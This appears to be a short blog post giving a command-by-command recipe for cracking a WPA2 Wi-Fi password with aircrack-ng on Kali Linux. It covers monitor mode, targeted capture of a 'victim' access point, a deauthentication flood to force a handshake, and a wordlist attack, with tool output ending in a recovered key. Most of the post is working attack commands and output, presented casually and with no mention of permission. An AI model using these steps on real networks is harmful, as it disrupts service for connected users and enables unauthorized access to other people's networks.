Dec 04, 2020
2 mins read
Wazzzaaaap WiFi hackers! Here is the command Gist of the Crack WPA2 with Kali Linux writeup I wrote on the Hacker Realm on Sudorealm.com
Setup
Connect your Wireless Card dude, don't forget that!
Check if it is connected: ifconfig wlan0or iwconfig wlan0
Put the Card on Monitor Mode
[email protected]:~# airmon-ng start wlan0
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'
PID Name
448 NetworkManager
525 dhclient
654 wpa_supplicant
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros Communications, Inc. TP-Link TL-WN322G v3 / TL-WN422G v2 802.11g [Atheros AR9271]
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)And check if you are on monitor mode with iwconfig wlan0monπ
Sniffing the air for targets
airodump-ng wlan0monWait until your target pops up on the list and press ctrl+c to stop the monitoring.
Start targeted monitoring of your victim AP
airodump-ng --bssid 50:C7:BF:DC:4C:E8 -c 11 wlan0mon -w sudorealmβ Do not Ctrl+C, you want that running until you catch a handshake.
Your target's bssid and the channel will be displayed on the generic monitoring you did before.
-w sudorealm will store the results of the monitoring in different files. You want a file named sudorealm_01.cap which has the handshake stored in it.
Deauthenticate victim to force a handshake Capture
β On a new terminal window.
aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 wlan0mon
13:43:26 Waiting for beacon frame (BSSID: 50:C7:BF:DC:4C:E8) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
13:43:26 Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:26 Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:27 Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:27 Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:28 Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]You can change the -0 0 to -0 20 to Force the victim to disconnect and connect again.
Now wait until the other terminal shows this:
CH 11 ][ Elapsed: 7 mins ][ 2019-02-22 13:43 ][ WPA handshake: 50:C7:BF:DC:4C:E8 WPA handshake of the victim AP. You are Set. πͺ
Dictionary Attack to crack the Handshake
aircrack-ng sudorealm-01.cap -w Desktop/sudorealm.txtSupposing you have some dictionaries somewhere in your system.
If you don't, here is a good start:
git clone github.com/danielmiessler/SecLists.gitGoogle that a bit and you'll thank me later.
00:00:00] 4/20 keys tested (316.73 k/s)
Time left: 0 seconds 20.00%
KEY FOUND! [ sudorealmRulez ]
Master Key : C3 3E A1 D6 E5 9E 58 66 B2 20 3E AC 27 90 44 E2
06 17 91 76 B7 98 A7 3C 9D 61 67 32 99 95 72 0E
Transient Key : EF 0B 80 7E 59 5A F4 15 51 4C 48 F8 62 7F 81 E7
D8 E7 3F E3 0A D4 2C 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : D5 D4 EB 86 16 33 4F FC 2C 74 3C E6 DB AF 81 70 The Password is Cracked, we are happy, and it's time for net surfing! πββοΈ
Bam Boom hacked! π©βπ» Leave your comments below or find me @
π€ https://www.reddit.com/user/stantz16 | The front page of the internet.
π₯https://twitter.com/DevThanos | The one that got hacked good.
π€΅ https://www.linkedin.com/in/athanasios-stantzouris-34ba44141/ | Facebook but not facebook.
Thanks Yall πππ₯³
